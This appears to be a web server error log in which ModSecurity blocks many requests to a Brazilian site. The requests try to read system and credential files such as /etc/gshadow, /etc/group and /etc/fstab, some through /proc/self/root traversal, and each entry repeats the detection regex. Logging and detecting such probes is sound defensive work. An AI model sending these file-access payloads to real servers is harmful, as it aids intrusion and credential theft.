[Fri Mar 20 05:30:37.059244 2026] [:error] [pid 9818:tid 140411674785536] [client 57.141.18.50:54886] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FrV1pVZ5mVmJwsFMRzQAAAEg"]
[Fri Mar 20 05:30:38.284292 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.20:54966] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FruoXxyEfFpUF8f9kBAAAAUc"]
[Fri Mar 20 05:30:38.824884 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.9:54994] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Frl1pVZ5mVmJwsFMR0wAAAEA"]
[Fri Mar 20 05:30:40.891694 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.241.31:55806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FsLninkcc-iUj5ApBBgAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:41.594980 2026] [:error] [pid 9818:tid 140411708356352] [client 57.141.18.92:55154] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FsV1pVZ5mVmJwsFMR3wAAAEQ"]
[Fri Mar 20 05:30:43.783445 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.34:55286] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FsxCii7xarUs8iHZJZgAAAhM"]
[Fri Mar 20 05:30:44.053187 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.61:55306] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FtOoXxyEfFpUF8f9kCwAAAUE"]
[Fri Mar 20 05:30:44.615492 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.57:55342] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FtOoXxyEfFpUF8f9kDAAAAVg"]
[Fri Mar 20 05:30:45.947069 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.119:55448] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FtfHIg5MgXLBnicPb7gAAAdM"]
[Fri Mar 20 05:30:47.257076 2026] [:error] [pid 9818:tid 140411674785536] [client 57.141.18.9:55526] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Ft11pVZ5mVmJwsFMR7gAAAEg"]
[Fri Mar 20 05:30:47.759509 2026] [:error] [pid 10189:tid 140411699963648] [client 57.141.18.20:55558] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FtzJ3M9BSuKP7CAb1dgAAAIU"]
[Fri Mar 20 05:30:48.655606 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.2:55602] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FuF1pVZ5mVmJwsFMR9QAAAEU"]
[Fri Mar 20 05:30:50.160441 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.99:55624] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FufHIg5MgXLBnicPb9AAAAdI"]
[Fri Mar 20 05:30:50.236735 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.67:55658] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FuvqxLDW4GITHUkTFLQAAARI"]
[Fri Mar 20 05:30:52.712868 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.40:55716] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FvDJ3M9BSuKP7CAb1ewAAAIQ"]
[Fri Mar 20 05:30:52.909018 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.62:55752] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FvPXLqtnMIWvjpaJ8hwAAApU"]
[Fri Mar 20 05:30:53.527488 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.92:55790] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fvbninkcc-iUj5ApBEAAAA48"]
[Fri Mar 20 05:30:54.339770 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.86:55818] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FvuoXxyEfFpUF8f9kGAAAAVA"]
[Fri Mar 20 05:30:55.895200 2026] [:error] [pid 11642:tid 140411599251200] [client 57.141.18.3:55922] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fv7ninkcc-iUj5ApBFAAAA5E"]
[Fri Mar 20 05:30:56.378993 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.86:55932] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FwAF0L0L-SsrnPo5KUQAAAsU"]
[Fri Mar 20 05:30:59.064427 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.48:55946] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fw9a6ubjKNq_cu4az1gAAA0A"]
[Fri Mar 20 05:30:59.467916 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.34:56052] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FwzJ3M9BSuKP7CAb1gQAAAIw"]
[Fri Mar 20 05:31:00.047322 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.111:56060] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FxOoXxyEfFpUF8f9kJAAAAVM"]
[Fri Mar 20 05:31:00.241329 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.115:56062] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FxNa6ubjKNq_cu4az1wAAA1Q"]
[Fri Mar 20 05:31:00.622260 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.55:56070] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FxNa6ubjKNq_cu4az2AAAA0I"]
[Fri Mar 20 05:31:02.131177 2026] [:error] [pid 10189:tid 140411699963648] [client 57.141.18.115:56120] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FxjJ3M9BSuKP7CAb1hAAAAIU"]
[Fri Mar 20 05:31:02.291024 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.119:56126] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FxhCii7xarUs8iHZJcgAAAhI"]
[Fri Mar 20 05:31:03.520465 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.84:56128] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FxzJ3M9BSuKP7CAb1iQAAAIQ"]
